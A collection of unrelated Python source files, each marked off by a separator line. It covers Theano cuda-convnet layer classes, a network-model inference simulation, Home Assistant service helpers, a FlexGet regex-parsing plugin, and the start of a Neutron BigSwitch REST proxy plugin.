self.pool_op = MaxPool(ds=self.ds, stride=self.stride)
def get_output_shape_for(self, input_shape):
if self.dimshuffle:
batch_size = input_shape[0]
num_input_channels = input_shape[1]
input_width, input_height = input_shape[2:4]
else:
batch_size = input_shape[3]
num_input_channels = input_shape[0]
input_width, input_height = input_shape[1:3]
output_width = int(np.ceil(float(input_width - self.ds + self.stride) / self.stride))
output_height = int(np.ceil(float(input_height - self.ds + self.stride) / self.stride))
if self.dimshuffle:
return (batch_size, num_input_channels, output_width, output_height)
else:
return (num_input_channels, output_width, output_height, batch_size)
def get_output_for(self, input, *args, **kwargs):
if self.dimshuffle:
input = input.dimshuffle(1, 2, 3, 0) # bc01 to c01b
contiguous_input = gpu_contiguous(input)
pooled = self.pool_op(contiguous_input)
if self.dimshuffle:
return pooled.dimshuffle(3, 0, 1, 2) # c01b to bc01
else:
return pooled
# TODO: crossmapnorm
# from pylearn2.sandbox.cuda_convnet.response_norm import CrossMapNorm
## Helper classes for switching between bc01 and c01b input formats
class ShuffleBC01ToC01BLayer(base.Layer):
"""
This layer dimshuffles 4D input for interoperability between c01b and bc01 ops.
bc01 (theano) -> c01b (cuda-convnet)
"""
def get_output_shape_for(self, input_shape):
return (input_shape[1], input_shape[2], input_shape[3], input_shape[0])
def get_output_for(self, input, *args, **kwargs):
return input.dimshuffle(1, 2, 3, 0)
bc01_to_c01b = ShuffleBC01ToC01BLayer # shortcut
class ShuffleC01BToBC01Layer(base.Layer):
"""
This layer dimshuffles 4D input for interoperability between c01b and bc01 ops.
c01b (cuda-convnet) -> bc01 (theano)
"""
def get_output_shape_for(self, input_shape):
return (input_shape[3], input_shape[0], input_shape[1], input_shape[2])
def get_output_for(self, input, *args, **kwargs):
return input.dimshuffle(3, 0, 1, 2)
c01b_to_bc01 = ShuffleC01BToBC01Layer # shortcut
## c01b versions of other Layer classes
class NINLayer_c01b(base.Layer):
"""
This does the same as nntools.layers.NINLayer, but operates with c01b
axis arrangement instead of bc01. This reduces the number of shuffles
and reshapes required and might be faster as a result.
"""
def __init__(self, input_layer, num_units, untie_biases=False,
W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify):
super(NINLayer_c01b, self).__init__(input_layer)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_units = num_units
self.untie_biases = untie_biases
output_shape = self.input_layer.get_output_shape()
num_input_channels = output_shape[0]
self.W = self.create_param(W, (num_units, num_input_channels))
if self.untie_biases:
output_shape = self.get_output_shape()
self.b = self.create_param(b, (num_units,) + output_shape[1:-1])
else:
self.b = self.create_param(b, (num_units,))
def get_params(self):
return [self.W, self.b]
def get_bias_params(self):
return [self.b]
def get_output_shape_for(self, input_shape):
return (self.num_units,) + input_shape[1:]
def get_output_for(self, input, *args, **kwargs):
out = T.tensordot(self.W, input, axes=[[1], [0]]) # fc * c01b... = f01b...
if self.untie_biases:
bias_axes = range(input.ndim - 1) + ['x']
else:
bias_axes = [0] + (['x'] * (input.ndim - 1))
b_shuffled = self.b.dimshuffle(bias_axes)
return self.nonlinearity(out + b_shuffled)
|
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import scikits.statsmodels.api as sm
import scipy.optimize as opt
import scipy.linalg as la
# Parameters
params = { 'N': 400,
'alpha_sd': 0.0,
'alpha_unif': 0.0,
'B': 0,
'beta_sd': 1.0,
'x_discrete': False,
'target': ('degree', 2),
'N_subs': range(15, 60, 5),
'num_fits': 2,
'do_inference': True,
'external_regression': False,
'use_BFGS': False,
'perturb_Phi': 0.0 }
# Set random seed for reproducible output
np.random.seed(137)
# Define mapping from covariates and parameters alpha, beta, kappa to
# edge probabilties
def edge_probabilities(alpha, beta, kappa, x):
N = x.shape[0]
logit_P = np.zeros((N,N))
for i in range(N):
logit_P[i,:] += alpha[0,i]
for j in range(N):
logit_P[:,j] += alpha[0,j]
logit_P += np.dot(x, beta)
logit_P += kappa
return 1.0 / (np.exp(-logit_P) + 1.0)
# Define negative log-likelihood
def nll(alpha, beta, kappa, A, x):
P = edge_probabilities(alpha, beta, kappa, x)
return -np.sum(np.log(P ** A) + np.log((1.0 - P) ** (1.0 - A)))
# Numerical search for kappa to provide the right expected graph properties
def target_to_kappa(d, alpha, beta, x):
target, val = d
N = x.shape[0]
def obj(kappa):
exp_edges = np.sum(edge_probabilities(alpha, beta, kappa, x))
if target == 'degree':
exp_degree = exp_edges / (1.0 * N)
return abs(exp_degree - val)
elif target == 'density':
exp_density = exp_edges / (1.0 * N ** 2)
return abs(exp_density - val)
return opt.golden(obj)
# Logistic regression solver relying on BFGS minimizer
def log_reg(y, Phi):
if params['use_BFGS']:
T = np.dot(y, Phi)
def nll_prime(beta):
P = 1.0 / (np.exp(-np.dot(Phi, beta)) + 1.0)
return np.dot(P, Phi) - T
beta_shape = Phi.shape[1]
def nll(beta):
P = 1.0 / (np.exp(-np.dot(Phi, beta)) + 1.0)
return -np.sum(np.log(P ** y) + np.log((1.0 - P) ** (1.0 - y)))
if params['use_BFGS']:
return opt.fmin_bfgs(nll, np.zeros(beta_shape), fprime = nll_prime)
else:
return opt.fmin(nll, np.zeros(beta_shape))
# Procedure to find MLE via logistic regression
def infer(A, x, fit_alpha = False):
N = A.shape[0]
B = x.shape[2]
if fit_alpha:
# (Separately) sort rows and columns of A by increasing sums
r_ord = np.argsort(np.sum(A, axis = 1))
c_ord = np.argsort(np.sum(A, axis = 0))
A = A[r_ord][:,c_ord]
x = x[r_ord][:,c_ord]
# Recursively examine for submatrices that will send
# corresponding EMLE parameter estimates to infinity and
# assemble list of "active" submatrices to retain
to_screen = [(np.arange(N), np.arange(N))]
act = []
while len(to_screen) > 0:
r_act, c_act = to_screen.pop()
A_act = A[r_act][:,c_act]
n_act = A_act.shape
violation = False
trivial = [(0,0), (0,n_act[1]), (n_act[0],0), (n_act[0],n_act[1])]
for i,j in [(i,j)
for i in range(n_act[0] + 1)
for j in range(n_act[1] + 1)]:
if (i,j) in trivial: continue
if np.any(A_act[:i][:,:j]): continue
if not np.all(A_act[i:][:,j:]): continue
if i > 0 and j < n_act[1]:
A_sub = A_act[:i][:,j:]
if (np.any(A_sub) and (not np.all(A_sub))):
to_screen.append((r_act[np.arange(i)],
c_act[np.arange(j, n_act[1])]))
if i < n_act[0] and j > 0:
A_sub = A_act[i:][:,:j]
if (np.any(A_sub) and (not np.all(A_sub))):
to_screen.append((r_act[np.arange(i, n_act[0])],
c_act[np.arange(j)]))
violation = True
break
if not violation:
act.append((r_act, c_act))
if len(act) == 0:
return { 'beta': np.zeros(B), 'N_act_r': 0, 'N_act_c': 0 }
# Calculate size of design matrix and outcome vector, then
# construct them
N_act_r, N_act_c = 0, B
for r_act, c_act in act:
N_act_r += len(r_act) * len(c_act)
N_act_c += len(r_act) + len(c_act)
y = np.zeros((N_act_r,))
Phi = np.zeros((N_act_r, N_act_c))
i_offset, j_offset = 0, B
for r_act, c_act in act:
i_inc = len(r_act) * len(c_act)
j_inc_r, j_inc_c = len(r_act), len(c_act)
A_act = A[r_act][:,c_act]
x_act = x[r_act][:,c_act]
y[i_offset:(i_offset + i_inc)] = A_act.reshape((i_inc,))
for b in range(B):
Phi[i_offset:(i_offset + i_inc), b] = \
x_act[:,:,b].reshape((i_inc,))
for r in range(j_inc_r):
phi_row = np.zeros((j_inc_r,j_inc_c))
phi_row[r,:] = 1.0
Phi[i_offset:(i_offset + i_inc), j_offset + r] = \
phi_row.reshape((i_inc,))
j_offset += j_inc_r
for c in range(j_inc_c):
phi_col = np.zeros((j_inc_r,j_inc_c))
phi_col[:,c] = 1.0
Phi[i_offset:(i_offset + i_inc), j_offset + c] = \
phi_col.reshape((i_inc,))
j_offset += j_inc_c
i_offset += i_inc
try:
Phi += params['perturb_Phi'] * \
np.random.normal(size = (N_act_r, N_act_c))
if params['external_regression']:
coefs = sm.Logit(y, Phi).fit().params
else:
coefs = log_reg(y, Phi)
except:
print y
print Phi
print Phi.shape
for r_act, c_act in act:
A_act = A[r_act][:,c_act]
print A_act
print np.sum(A_act, axis = 1)
print np.sum(A_act, axis = 0)
return { 'beta': np.zeros(B), 'N_act_r': 0, 'N_act_c': 0 }
return { 'beta': coefs[0:B], 'N_act_r': N_act_r, 'N_act_c': N_act_c }
else:
y = A.reshape((N*N,))
Phi = np.zeros((N*N,B + 1))
Phi[:,B] = 1.0
for b in range(B):
Phi[:,b] = x[:,:,b].reshape((N*N,))
Phi += params['perturb_Phi'] * np.random.normal(size = (N*N, B+1))
if params['external_regression']:
coefs = sm.Logit(y, Phi).fit().params
else:
coefs = log_reg(y, Phi)
return { 'beta': coefs[0:B], 'N_act_r': N*N, 'N_act_c': (B + 1) }
# Generate latent parameters
if params['alpha_sd'] > 0.0:
alpha = np.random.normal(0, params['alpha_sd'], (2,params['N']))
elif params['alpha_unif'] > 0.0:
alpha = np.random.uniform(-params['alpha_unif'], params['alpha_unif'],
(2,params['N']))
else:
alpha = np.zeros((2,params['N']))
alpha[0] -= np.mean(alpha[0])
alpha[1] -= np.mean(alpha[1])
beta = np.random.normal(0, params['beta_sd'], params['B'])
if params['x_discrete']:
x = 2 * np.random.binomial(1, 0.5, (params['N'], params['N'], params['B']))
else:
x = np.random.normal(0, 1, (params['N'], params['N'], params['B']))
# Procedure for generating random subnetwork
def subnetwork(n):
inds = np.arange(params['N'])
np.random.shuffle(inds)
sub = inds[0:n]
alpha_sub = alpha[:,sub]
x_sub = x[sub][:,sub]
kappa_sub = target_to_kappa(params['target'], alpha_sub, beta, x_sub)
P_sub = edge_probabilities(alpha_sub, beta, kappa_sub, x_sub)
A_sub = np.random.random((n,n)) < P_sub
return alpha_sub, kappa_sub, A_sub, x_sub
# Some pre-analysis output
print 'Parameters:'
for field in params:
print '%s: %s' % (field, str(params[field]))
# Fit model on partially observed subnetworks and assess performance
bias = np.empty((params['B'],2,len(params['N_subs'])))
variance = np.empty((params['B'],2,len(params['N_subs'])))
act_ratio = np.empty((len(params['N_subs']),params['num_fits']))
network = np.empty((4,len(params['N_subs'])))
kappas = np.empty((len(params['N_subs']),params['num_fits']))
for n, N_sub in enumerate(params['N_subs']):
print 'N_sub = %d' % N_sub
estimate = np.empty((params['B'],2,params['num_fits']))
network_obs = np.empty((4,params['num_fits']))
for num_fit in range(params['num_fits']):
alpha_sub, kappa_sub, A_sub, x_sub = subnetwork(N_sub)
print 'kappa_sub = %.2f' % kappa_sub
network_obs[0,num_fit] = 1.0 * np.sum(A_sub) / N_sub
network_obs[1,num_fit] = np.max(np.sum(A_sub, axis = 1))
network_obs[2,num_fit] = np.max(np.sum(A_sub, axis = 0))
network_obs[3,num_fit] = 1.0 * np.sum(np.diagonal(A_sub)) / N_sub
kappas[n,num_fit] = kappa_sub
if params['do_inference']:
sub_nll = nll(alpha_sub, beta, kappa_sub, A_sub, x_sub)
print 'True subnetwork NLL: %.2f' % sub_nll
# Fit full model
fit = infer(A_sub, x_sub, fit_alpha = True)
for b in range(params['B']):
estimate[b,0,num_fit] = fit['beta'][b]
if fit['N_act_r'] > 0:
act_ratio[n,num_fit] = fit['N_act_r'] / fit['N_act_c']
else:
act_ratio[n,num_fit] = 0
# Fit model with zero alpha, i.e., stationary model
fit = infer(A_sub, x_sub, fit_alpha = False)
for b in range(params['B']):
estimate[b,1,num_fit] = fit['beta'][b]
if params['do_inference']:
for b, true_val in enumerate(beta):
for m in range(2):
bias[b,m,n] = np.mean(estimate[b,m] - true_val)
variance[b,m,n] = np.var(estimate[b,m])
for metric in range(4):
network[metric,n] = np.mean(network_obs[metric])
if params['do_inference']:
bias_sq = bias ** 2
mse = variance + bias_sq
# Plot inference performace, as well as data/parameter ratio
if params['do_inference']:
plt.figure()
plt.subplot(2,1,1)
for b, true_val in enumerate(beta):
plt.plot(params['N_subs'], mse[b,0] / abs(true_val), 'b')
plt.plot(params['N_subs'], mse[b,1] / abs(true_val), 'r')
plt.ylim(0, 3.0)
plt.title('Scaled MSE of beta')
plt.subplot(2,1,2)
for n in range(params['num_fits']):
plt.plot(params['N_subs'], act_ratio[:,n], 'k.', hold = True)
plt.ylabel('N_act_r / N_act_c')
# Plot network statistics as well as sparsity parameter
plt.figure()
for metric, name in enumerate(['average degree',
'max out-degree',
'max in-degree',
'self-edge probability']):
plt.subplot(5,1,(metric+1))
plt.plot(params['N_subs'], network[metric], '-')
plt.ylabel(name)
plt.ylim(ymin = 0)
plt.subplot(5,1,5)
for n in range(params['num_fits']):
plt.plot(params['N_subs'], kappas[:,n], 'k.', hold = True)
plt.ylabel('kappa_sub')
plt.show()
|
|
"""Service calling related helpers."""
import asyncio
from functools import wraps
import logging
from typing import Callable
import voluptuous as vol
from homeassistant.auth.permissions.const import CAT_ENTITIES, POLICY_CONTROL
from homeassistant.const import (
ATTR_ENTITY_ID, ENTITY_MATCH_ALL, ATTR_AREA_ID)
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, TemplateError, Unauthorized, UnknownUser)
from homeassistant.helpers import template, typing
from homeassistant.loader import async_get_integration, bind_hass
from homeassistant.util.yaml import load_yaml
import homeassistant.helpers.config_validation as cv
from homeassistant.util.async_ import run_coroutine_threadsafe
from homeassistant.helpers.typing import HomeAssistantType
CONF_SERVICE = 'service'
CONF_SERVICE_TEMPLATE = 'service_template'
CONF_SERVICE_ENTITY_ID = 'entity_id'
CONF_SERVICE_DATA = 'data'
CONF_SERVICE_DATA_TEMPLATE = 'data_template'
_LOGGER = logging.getLogger(__name__)
SERVICE_DESCRIPTION_CACHE = 'service_description_cache'
@bind_hass
def call_from_config(hass, config, blocking=False, variables=None,
validate_config=True):
"""Call a service based on a config hash."""
run_coroutine_threadsafe(
async_call_from_config(hass, config, blocking, variables,
validate_config), hass.loop).result()
@bind_hass
async def async_call_from_config(hass, config, blocking=False, variables=None,
validate_config=True, context=None):
"""Call a service based on a config hash."""
if validate_config:
try:
config = cv.SERVICE_SCHEMA(config)
except vol.Invalid as ex:
_LOGGER.error("Invalid config for calling service: %s", ex)
return
if CONF_SERVICE in config:
domain_service = config[CONF_SERVICE]
else:
try:
config[CONF_SERVICE_TEMPLATE].hass = hass
domain_service = config[CONF_SERVICE_TEMPLATE].async_render(
variables)
domain_service = cv.service(domain_service)
except TemplateError as ex:
if blocking:
raise
_LOGGER.error('Error rendering service name template: %s', ex)
return
except vol.Invalid:
if blocking:
raise
_LOGGER.error('Template rendered invalid service: %s',
domain_service)
return
domain, service_name = domain_service.split('.', 1)
service_data = dict(config.get(CONF_SERVICE_DATA, {}))
if CONF_SERVICE_DATA_TEMPLATE in config:
try:
template.attach(hass, config[CONF_SERVICE_DATA_TEMPLATE])
service_data.update(template.render_complex(
config[CONF_SERVICE_DATA_TEMPLATE], variables))
except TemplateError as ex:
_LOGGER.error('Error rendering data template: %s', ex)
return
if CONF_SERVICE_ENTITY_ID in config:
service_data[ATTR_ENTITY_ID] = config[CONF_SERVICE_ENTITY_ID]
await hass.services.async_call(
domain, service_name, service_data, blocking=blocking, context=context)
@bind_hass
def extract_entity_ids(hass, service_call, expand_group=True):
"""Extract a list of entity ids from a service call.
Will convert group entity ids to the entity ids it represents.
"""
return run_coroutine_threadsafe(
async_extract_entity_ids(hass, service_call, expand_group), hass.loop
).result()
@bind_hass
async def async_extract_entity_ids(hass, service_call, expand_group=True):
"""Extract a list of entity ids from a service call.
Will convert group entity ids to the entity ids it represents.
Async friendly.
"""
entity_ids = service_call.data.get(ATTR_ENTITY_ID)
area_ids = service_call.data.get(ATTR_AREA_ID)
if not entity_ids and not area_ids:
return []
extracted = set()
if entity_ids:
# Entity ID attr can be a list or a string
if isinstance(entity_ids, str):
entity_ids = [entity_ids]
if expand_group:
entity_ids = \
hass.components.group.expand_entity_ids(entity_ids)
extracted.update(entity_ids)
if area_ids:
if isinstance(area_ids, str):
area_ids = [area_ids]
dev_reg, ent_reg = await asyncio.gather(
hass.helpers.device_registry.async_get_registry(),
hass.helpers.entity_registry.async_get_registry(),
)
devices = [
device
for area_id in area_ids
for device in
hass.helpers.device_registry.async_entries_for_area(
dev_reg, area_id)
]
extracted.update(
entry.entity_id
for device in devices
for entry in
hass.helpers.entity_registry.async_entries_for_device(
ent_reg, device.id)
)
return extracted
async def _load_services_file(hass: HomeAssistantType, domain: str):
"""Load services file for an integration."""
integration = await async_get_integration(hass, domain)
try:
return await hass.async_add_executor_job(
load_yaml, str(integration.file_path / 'services.yaml'))
except FileNotFoundError:
_LOGGER.warning("Unable to find services.yaml for the %s integration",
domain)
return {}
except HomeAssistantError:
_LOGGER.warning("Unable to parse services.yaml for the %s integration",
domain)
return {}
@bind_hass
async def async_get_all_descriptions(hass):
"""Return descriptions (i.e. user documentation) for all service calls."""
descriptions_cache = hass.data.setdefault(SERVICE_DESCRIPTION_CACHE, {})
format_cache_key = '{}.{}'.format
services = hass.services.async_services()
# See if there are new services not seen before.
# Any service that we saw before already has an entry in description_cache.
missing = set()
for domain in services:
for service in services[domain]:
if format_cache_key(domain, service) not in descriptions_cache:
missing.add(domain)
break
# Files we loaded for missing descriptions
loaded = {}
if missing:
contents = await asyncio.gather(*[
_load_services_file(hass, domain) for domain in missing
])
for domain, content in zip(missing, contents):
loaded[domain] = content
# Build response
descriptions = {}
for domain in services:
descriptions[domain] = {}
for service in services[domain]:
cache_key = format_cache_key(domain, service)
description = descriptions_cache.get(cache_key)
# Cache missing descriptions
if description is None:
domain_yaml = loaded[domain]
yaml_description = domain_yaml.get(service, {})
# Don't warn for missing services, because it triggers false
# positives for things like scripts, that register as a service
description = descriptions_cache[cache_key] = {
'description': yaml_description.get('description', ''),
'fields': yaml_description.get('fields', {})
}
descriptions[domain][service] = description
return descriptions
@bind_hass
async def entity_service_call(hass, platforms, func, call, service_name='',
required_features=None):
"""Handle an entity service call.
Calls all platforms simultaneously.
"""
if call.context.user_id:
user = await hass.auth.async_get_user(call.context.user_id)
if user is None:
raise UnknownUser(context=call.context)
entity_perms = user.permissions.check_entity
else:
entity_perms = None
# Are we trying to target all entities
if ATTR_ENTITY_ID in call.data:
target_all_entities = call.data[ATTR_ENTITY_ID] == ENTITY_MATCH_ALL
else:
# Remove the service_name parameter along with this warning
_LOGGER.warning(
'Not passing an entity ID to a service to target all '
'entities is deprecated. Update your call to %s to be '
'instead: entity_id: %s', service_name, ENTITY_MATCH_ALL)
target_all_entities = True
if not target_all_entities:
# A set of entities we're trying to target.
entity_ids = await async_extract_entity_ids(hass, call, True)
# If the service function is a string, we'll pass it the service call data
if isinstance(func, str):
data = {key: val for key, val in call.data.items()
if key != ATTR_ENTITY_ID}
# If the service function is not a string, we pass the service call
else:
data = call
# Check the permissions
# A list with for each platform in platforms a list of entities to call
# the service on.
platforms_entities = []
if entity_perms is None:
for platform in platforms:
if target_all_entities:
platforms_entities.append(list(platform.entities.values()))
else:
platforms_entities.append([
entity for entity in platform.entities.values()
if entity.entity_id in entity_ids
])
elif target_all_entities:
# If we target all entities, we will select all entities the user
# is allowed to control.
for platform in platforms:
platforms_entities.append([
entity for entity in platform.entities.values()
if entity_perms(entity.entity_id, POLICY_CONTROL)])
else:
for platform in platforms:
platform_entities = []
for entity in platform.entities.values():
if entity.entity_id not in entity_ids:
continue
if not entity_perms(entity.entity_id, POLICY_CONTROL):
raise Unauthorized(
context=call.context,
entity_id=entity.entity_id,
permission=POLICY_CONTROL
)
platform_entities.append(entity)
platforms_entities.append(platform_entities)
tasks = [
_handle_service_platform_call(func, data, entities, call.context,
required_features)
for platform, entities in zip(platforms, platforms_entities)
]
if tasks:
done, pending = await asyncio.wait(tasks)
assert not pending
for future in done:
future.result() # pop exception if have
async def _handle_service_platform_call(func, data, entities, context,
required_features):
"""Handle a function call."""
tasks = []
for entity in entities:
if not entity.available:
continue
# Skip entities that don't have the required feature.
if required_features is not None \
and not any(entity.supported_features & feature_set
for feature_set in required_features):
continue
entity.async_set_context(context)
if isinstance(func, str):
await getattr(entity, func)(**data)
else:
await func(entity, data)
if entity.should_poll:
tasks.append(entity.async_update_ha_state(True))
if tasks:
done, pending = await asyncio.wait(tasks)
assert not pending
for future in done:
future.result() # pop exception if have
@bind_hass
@ha.callback
def async_register_admin_service(
hass: typing.HomeAssistantType, domain: str,
service: str, service_func: Callable,
schema: vol.Schema = vol.Schema({}, extra=vol.PREVENT_EXTRA)) -> None:
"""Register a service that requires admin access."""
@wraps(service_func)
async def admin_handler(call):
if call.context.user_id:
user = await hass.auth.async_get_user(call.context.user_id)
if user is None:
raise UnknownUser(context=call.context)
if not user.is_admin:
raise Unauthorized(context=call.context)
await hass.async_add_job(service_func, call)
hass.services.async_register(
domain, service, admin_handler, schema
)
@bind_hass
@ha.callback
def verify_domain_control(hass: HomeAssistantType, domain: str) -> Callable:
"""Ensure permission to access any entity under domain in service call."""
def decorator(service_handler: Callable) -> Callable:
"""Decorate."""
if not asyncio.iscoroutinefunction(service_handler):
raise HomeAssistantError(
'Can only decorate async functions.')
async def check_permissions(call):
"""Check user permission and raise before call if unauthorized."""
if not call.context.user_id:
return await service_handler(call)
user = await hass.auth.async_get_user(call.context.user_id)
if user is None:
raise UnknownUser(
context=call.context,
permission=POLICY_CONTROL,
user_id=call.context.user_id)
reg = await hass.helpers.entity_registry.async_get_registry()
entities = [
entity.entity_id for entity in reg.entities.values()
if entity.platform == domain
]
for entity_id in entities:
if user.permissions.check_entity(entity_id, POLICY_CONTROL):
return await service_handler(call)
raise Unauthorized(
context=call.context,
permission=POLICY_CONTROL,
user_id=call.context.user_id,
perm_category=CAT_ENTITIES
)
return check_permissions
return decorator
|
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import codecs
import re
import logging
import os
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils.cached_input import cached
log = logging.getLogger('regexp_parse')
class RegexpParse(object):
"""This plugin is designed to take input from a web resource or a file.
It then parses the text via regexps supplied in the config file.
source: is a file or url to get the data from. You can specify a username:password
sections: Takes a list of dicts that contain regexps to split the data up into sections.
The regexps listed here are used by find all so every matching string in the data will be
a valid section.
keys: hold the keys that will be set in the entries
key:
regexps: a list of dicts that hold regexps. The key is set to the first string that matches
any of the regexps listed. The regexps are evaluated in the order they are supplied so if a
string matches the first regexp none of the others in the list will be used.
required: a boolean that when set to true will only allow entries that contain this key
onto the next stage. url and title are always required no matter what you do (part of flexget)
#TODO: consider adding a set field that will allow you to set the field if no regexps match
#TODO: consider a mode field that allows a growing list for a field instead of just setting to
# first match
Example config
regexp_parse:
source: http://username:password@ezrss.it/feed/
sections:
- {regexp: "(?<=<item>).*?(?=</item>)", flags: "DOTALL,IGNORECASE"}
keys:
title:
regexps:
- {regexp: '(?<=<title><!\[CDATA\[).*?(?=\]\]></title>)'} #comment
url:
regexps:
- {regexp: "magnet:.*?(?=])"}
custom_field:
regexps:
- {regexp: "custom regexps", flags: "comma seperated list of flags (see python regex docs)"}
required: False
custom_field2:
regexps:
- {regexp: 'first custom regexps'}
- {regexp: 'can't find first regexp so try this one'}
"""
# dict used to convert string values of regexp flags to int
FLAG_VALUES = {'DEBUG': re.DEBUG,
'I': re.I,
'IGNORECASE': re.IGNORECASE,
'L': re.L,
'LOCALE': re.LOCALE,
'M': re.M,
'MULTILINE': re.MULTILINE,
'S': re.S,
'DOTALL': re.DOTALL,
'U': re.U,
'UNICODE': re.UNICODE,
'X': re.X,
'VERBOSE': re.VERBOSE
}
def __init__(self):
self.required = []
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('url', key='source', required=True)
root.accept('file', key='source', required=True)
# sections to divied source into
sections_regexp_lists = root.accept('list', key='sections')
section_regexp_list = sections_regexp_lists.accept('dict', required=True)
section_regexp_list.accept('regexp', key='regexp', required=True)
section_regexp_list.accept('text', key='flags')
keys = root.accept('dict', key='keys', required=True)
# required key need to specify for validator
title = keys.accept('dict', key='title', required=True)
title.accept('boolean', key='required')
regexp_list = title.accept('list', key='regexps', required=True)
regexp = regexp_list.accept('dict', required=True)
regexp.accept('regexp', key='regexp', required=True)
regexp.accept('text', key='flags')
# required key need to specify for validator
url = keys.accept_any_key('dict', key='url', required=True)
url.accept('boolean', key='required')
regexp_list = url.accept('list', key='regexps', required=True)
regexp = regexp_list.accept('dict', required=True)
regexp.accept('regexp', key='regexp', required=True)
regexp.accept('text', key='flags')
# accept any other key the user wants to use
key = keys.accept_any_key('dict')
key.accept('boolean', key='required')
regexp_list = key.accept('list', key='regexps', required=True)
regexp = regexp_list.accept('dict', required=True)
regexp.accept('regexp', key='regexp', required=True)
regexp.accept('text', key='flags')
return root
def flagstr_to_flags(self, flag_str):
"""turns a comma seperated list of flags into the int value."""
COMBIND_FLAGS = 0
split_flags = flag_str.split(',')
for flag in split_flags:
COMBIND_FLAGS = COMBIND_FLAGS | RegexpParse.FLAG_VALUES[flag.strip()]
return COMBIND_FLAGS
def compile_regexp_dict_list(self, re_list):
"""turns a list of dicts containing regexps information into a list of compiled regexps."""
compiled_regexps = []
for dic in re_list:
flags = 0
if 'flags' in dic:
flags = self.flagstr_to_flags(dic['flags'])
compiled_regexps.append(re.compile(dic['regexp'], flags))
return compiled_regexps
def isvalid(self, entry):
"""checks to make sure that all required fields are present in the entry."""
for key in self.required:
if key not in entry:
return False
return entry.isvalid()
@cached('regexp_parse')
@plugin.internet(log)
def on_task_input(self, task, config):
url = config['source']
# if it's a file open it and read into content (assume utf-8 encoding)
if os.path.isfile(os.path.expanduser(url)):
content = codecs.open(url, 'r', encoding='utf-8').read()
# else use requests to get the data
else:
content = task.requests.get(url).text
sections = []
seperators = config.get('sections')
if seperators:
for sep in seperators:
flags = 0
if 'flags' in sep:
flags = self.flagstr_to_flags(sep['flags'])
sections.extend(re.findall(sep['regexp'], content, flags))
# no seperators just do work on the whole content
else:
sections.append(content)
# holds all the regex in a dict for the field they are trying to fill
key_to_regexps = {}
# put every key in keys into the rey_to_regexps list
for key, value in config['keys'].items():
key_to_regexps[key] = self.compile_regexp_dict_list(value['regexps'])
if 'required' in value and value['required']:
self.required.append(key)
entries = []
for section in sections:
entry = Entry()
for key, regexps in key_to_regexps.items():
for regexp in regexps:
m = regexp.search(section)
if m:
entry[key] = m.group(0)
break
if self.isvalid(entry):
entries.append(entry)
return entries
@event('plugin.register')
def register_plugin():
plugin.register(RegexpParse, 'regexp_parse', api_ver=2)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Big Switch Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Mandeep Dhami, Big Switch Networks, Inc.
# @author: Sumit Naiksatam, sumitnaiksatam@gmail.com, Big Switch Networks, Inc.
"""
Neutron REST Proxy Plug-in for Big Switch and FloodLight Controllers.
NeutronRestProxy provides a generic neutron plugin that translates all plugin
function calls to equivalent authenticated REST calls to a set of redundant
external network controllers. It also keeps persistent store for all neutron
state to allow for re-sync of the external controller(s), if required.
The local state on the plugin also allows for local response and fast-fail
semantics where it can be determined based on the local persistent store.
Network controller specific code is decoupled from this plugin and expected
to reside on the controller itself (via the REST interface).
This allows for:
- independent authentication and redundancy schemes between neutron and the
network controller
- independent upgrade/development cycles between neutron and the controller
as it limits the proxy code upgrade requirement to neutron release cycle
and the controller specific code upgrade requirement to controller code
- ability to sync the controller with neutron for independent recovery/reset
External REST API used by proxy is the same API as defined for neutron (JSON
subset) with some additional parameters (gateway on network-create and macaddr
on port-attach) on an additional PUT to do a bulk dump of all persistent data.
"""
import base64
import copy
import httplib
import json
import os
import socket
from oslo.config import cfg
from neutron.api.rpc.agentnotifiers import dhcp_rpc_agent_api
from neutron.common import constants as const
from neutron.common import exceptions
from neutron.common import rpc as q_rpc
from neutron.common import topics
from neutron.common import utils
from neutron import context as qcontext
from neutron.db import api as db
from neutron.db import db_base_plugin_v2
from neutron.db import dhcp_rpc_base
from neutron.db import l3_db
from neutron.extensions import l3
from neutron.extensions import portbindings
from neutron.openstack.common import log as logging
from neutron.openstack.common import rpc
from neutron.plugins.bigswitch.db import porttracker_db
from neutron.plugins.bigswitch import routerrule_db
from neutron.plugins.bigswitch.version import version_string_with_vcs
LOG = logging.getLogger(__name__)
# Include the BigSwitch Extensions path in the api_extensions
EXTENSIONS_PATH = os.path.join(os.path.dirname(__file__), 'extensions')
if not cfg.CONF.api_extensions_path:
cfg.CONF.set_override('api_extensions_path',
EXTENSIONS_PATH)
restproxy_opts = [
cfg.StrOpt('servers', default='localhost:8800',
help=_("A comma separated list of BigSwitch or Floodlight "
"servers and port numbers. The plugin proxies the "
"requests to the BigSwitch/Floodlight server, "
"which performs the networking configuration. Note that "
"only one server is needed per deployment, but you may "
"wish to deploy multiple servers to support failover.")),
cfg.StrOpt('server_auth', default='username:password', secret=True,
help=_("The username and password for authenticating against "
" the BigSwitch or Floodlight controller.")),
cfg.BoolOpt('server_ssl', default=False,
help=_("If True, Use SSL when connecting to the BigSwitch or "
"Floodlight controller.")),
cfg.BoolOpt('sync_data', default=False,
help=_("Sync data on connect")),
cfg.IntOpt('server_timeout', default=10,
help=_("Maximum number of seconds to wait for proxy request "
"to connect and complete.")),
cfg.StrOpt('neutron_id', default='neutron-' + utils.get_hostname(),
deprecated_name='quantum_id',
help=_("User defined identifier for this Neutron deployment")),
cfg.BoolOpt('add_meta_server_route', default=True,
help=_("Flag to decide if a route to the metadata server "
"should be injected into the VM")),
]
